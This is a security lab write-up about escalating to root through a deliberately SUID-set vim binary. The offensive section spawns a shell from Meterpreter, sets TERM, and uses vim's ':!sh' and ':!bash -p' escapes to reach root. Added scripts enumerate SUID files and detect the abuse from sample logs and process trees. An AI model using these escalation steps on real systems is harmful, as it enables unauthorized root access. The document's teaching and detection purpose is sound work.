
Lab 3 — Privilege Escalation

Exploit: misconfigured SUID on vim to gain root. Detect via logs and process list; respond by killing sessions and hardening.

Scenario

Following the successful SSH compromise in Lab 2, access was upgraded from a BSD shell to a Meterpreter session. The user lacks root privileges, so the next step is privilege escalation. For this lab, the vim binary is intentionally misconfigured with the SUID bit to demonstrate a common escalation path.

SUID: What It Is

The SUID (Set User ID) permission bit causes an executable to run with the effective UID of the file's owner rather than that of the caller. In ls -l output it appears as an s in the owner's execute position (a capital S means the bit is set but the owner's execute bit is not).

-rwsr-xr-x 1 root root 12345 Dec 27 12:00 example_program

When a non-root user runs example_program, it executes with an effective UID of 0 (root). Setting SUID on binaries that can run arbitrary commands (editors, shells, interpreters) hands any local user a trivial path to root.
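The first step of the escalation workflow is enumerating SUID candidates. The script below is an added example, not code from the lab page: it lists set-user-ID files under a given root with find -perm -4000 and checks individual files with the POSIX test -u. Because it must run anywhere without root, it builds a constructed directory tree (a fake vim and ping with SUID set, a plain ls, and an SGID-only wall) in a temp dir instead of scanning a real host.

```shell
#!/bin/sh
# Added example (not from the lab page): enumerate set-user-ID files the way
# an attacker or auditor would. The tree is whatever you pass in; the demo
# builds a constructed one under mktemp so it runs unprivileged on any host.

# Print every regular file under $1 that has the SUID bit.
# -perm -4000 matches files whose mode includes at least bit 04000.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Per-file check: test -u is POSIX and true when the set-user-ID bit is on.
is_suid() {
    [ -u "$1" ]
}

# Build a constructed tree: a fake "vim" with SUID (the lab's misconfiguration),
# a fake "ping" with SUID (legitimately SUID on many distros), an ordinary
# executable, and an SGID-only file that must NOT match. Prints the root path.
build_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/bin"
    for f in "$root/usr/bin/vim" "$root/bin/ping" "$root/usr/bin/ls" "$root/usr/bin/wall"; do
        printf '#!/bin/sh\n' > "$f"
    done
    chmod 4755 "$root/usr/bin/vim"   # rwsr-xr-x : the misconfiguration
    chmod 4755 "$root/bin/ping"      # rwsr-xr-x : expected on many systems
    chmod 0755 "$root/usr/bin/ls"    # rwxr-xr-x : no special bits
    chmod 2755 "$root/usr/bin/wall"  # rwxr-sr-x : SGID only, must not match
    printf '%s\n' "$root"
}

# Run the enumeration over the demo tree and print how many SUID files it finds.
demo_suid_count() {
    root=$(build_demo_tree)
    list_suid "$root" | wc -l | tr -d ' '
    rm -rf "$root"
}

# Stand-alone run: expect 2 (vim and ping), never wall or ls.
demo_suid_count
```

On a real target replace the demo tree with / (find / -type f -perm -4000 2>/dev/null) and compare the list against what the distribution ships; an editor, shell or interpreter in that list is the candidate to try first.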

Offensive

From Meterpreter, spawn an interactive shell:

/bin/sh -i
Spawning an interactive /bin/sh from Meterpreter
Interactive shell obtained.

Initially, vim misbehaved inside this pseudo-tty: editor commands did not work as expected. Inspecting the environment showed that TERM was unset, so vim had no terminal description to drive the screen with.

Environment inspection showing missing TERM variable
TERM not set.
Exporting TERM=xterm so vim behaves correctly
Fixing terminal with export TERM=xterm.

With SUID set on vim, the editor itself runs as root, so a shell spawned from inside it inherits that effective UID. Confirm with id that the euid is 0: some shells drop the effective UID back to the real one when the two differ (bash does unless started with -p), in which case use :!bash -p instead.

vim
:!sh
Using :!sh inside vim to spawn a shell
:!sh spawns a privileged shell.
Proof of root after exploiting SUID vim
Root access confirmed.

Defensive

Incident Detection

Review authentication and command logs to confirm abuse of vim to spawn a shell:

Logs showing vim execution with -c /bin/sh and sudo attempts
Log events highlight suspicious vim usage launching /bin/sh.

Correlate with process listings to confirm interactive shells and ownership changes:

ps aux output showing shells under ronny and root, indicating escalation
Processes show escalation from user ronny to root.
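The two detection steps above (log review and process-list correlation) as an added example that is not part of the lab page. The log lines and the ps snapshot are constructed for this demo, not captured from the lab host; the formats imitate sudo denials, auditd EXECVE records, a shell-history logger and ps -eo pid,ppid,user,comm output. The first check greps for vim launched with a shell-spawning argument; the second walks each root-owned shell's ancestry and flags it when a non-root process sits above it, which is exactly the "shells under ronny and root" pattern the process listing shows.

```shell
#!/bin/sh
# Added example, not part of the lab page: the two detection checks from the
# write-up run over constructed sample data.

# Constructed log lines: two sudo denials, an auditd EXECVE record for
# vim -c ':!/bin/sh', a benign vim invocation, a shell-history line, and noise.
sample_log() {
cat <<'EOF'
Dec 27 12:01:03 nas sudo:    ronny : command not allowed ; TTY=pts/1 ; PWD=/home/ronny ; USER=root ; COMMAND=/bin/sh
Dec 27 12:01:05 nas sudo:    ronny : command not allowed ; TTY=pts/1 ; PWD=/home/ronny ; USER=root ; COMMAND=/usr/bin/vim
Dec 27 12:02:10 nas audit: type=EXECVE msg=audit(1703678530.123:456): argc=3 a0="vim" a1="-c" a2=":!/bin/sh"
Dec 27 12:02:12 nas audit: type=EXECVE msg=audit(1703678532.201:457): argc=2 a0="vim" a1="/etc/ssh/sshd_config"
Dec 27 12:02:40 nas bash[901]: HISTORY ronny pts/1: vim -c ':!sh'
Dec 27 12:03:00 nas sshd[456]: Accepted password for ronny from 10.0.0.5 port 51234 ssh2
EOF
}

# Check 1: lines where vim is given a -c command or a :! escape that ends in
# a shell. Deliberately broad (triage, not a precise signature); reads stdin.
flag_vim_shell_escapes() {
    grep -E '(^|[[:space:]"/])vim[[:space:]"].*(-c|:!).*(/bin/)?(ba|da)?sh'
}

# Constructed ps -eo pid,ppid,user,comm snapshot. Note vim shows as root:
# ps reports the effective user, and the SUID binary runs with euid 0.
sample_ps() {
cat <<'EOF'
  PID  PPID USER     COMMAND
    1     0 root     init
  456     1 root     sshd
  800   456 ronny    sshd
  812   800 ronny    sh
  840   812 root     vim
  861   840 root     sh
  870   861 root     id
  900   456 root     sshd
  950   900 root     bash
EOF
}

# Check 2: for every root-owned shell, walk up the parent chain; if any
# ancestor belongs to a non-root user, that shell was not started by root.
find_escalated_shells() {
    awk '
    NR == 1 { next }                              # skip the header line
    { ppid[$1] = $2; user[$1] = $3; comm[$1] = $4 }
    END {
        for (p in comm) {
            if (user[p] != "root") continue
            if (comm[p] !~ /^(sh|bash|dash|zsh)$/) continue
            a = ppid[p]
            while (a in ppid && a != p) {         # stops at pid 1 (ppid 0)
                if (user[a] != "root") {
                    printf "root shell pid %s (parent %s %s) descends from %s pid %s\n",
                           p, ppid[p], comm[ppid[p]], user[a], a
                    break
                }
                a = ppid[a]
            }
        }
    }'
}

# Counts used by the stand-alone run: expect 2 log hits and 1 escalated shell.
demo_log_hits() { sample_log | flag_vim_shell_escapes | wc -l | tr -d ' '; }
demo_ps_hits()  { sample_ps  | find_escalated_shells | wc -l | tr -d ' '; }

sample_log | flag_vim_shell_escapes
sample_ps  | find_escalated_shells
```

The ancestry walk is what makes the second check useful: a root shell under sshd (pid 950) is normal, while a root shell whose grandparent is ronny's sh (pid 861 via vim 840) is the escalation. On a live host feed it with ps -eo pid,ppid,user,comm and the log check with auth.log, sudo logs or ausearch output.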

Response

Terminate malicious sessions and clean up. Kill processes tied to the compromised user and any suspicious root shells; this ends the current session, but the SUID bit on vim must also be removed or the next login repeats the escalation:

Killing processes tied to the compromised session
Stopping rogue shells and sessions.

On the attacker side, access is lost:

Attacker session terminated after defensive actions
Command terminated after response actions.

Privilege Escalation via SUID & Environment

This lab demonstrates how a misconfigured SUID binary, plus a little environment repair on the attacker's pseudo-tty (setting TERM), is enough to reach root. Production systems rarely ship with SUID on editors, but legacy hosts and ad-hoc admin changes can introduce the flaw. The workflow mirrors a real assessment: enumerate SUID candidates, fix environment and pty issues, and pivot to a root shell.

Real-World Takeaways
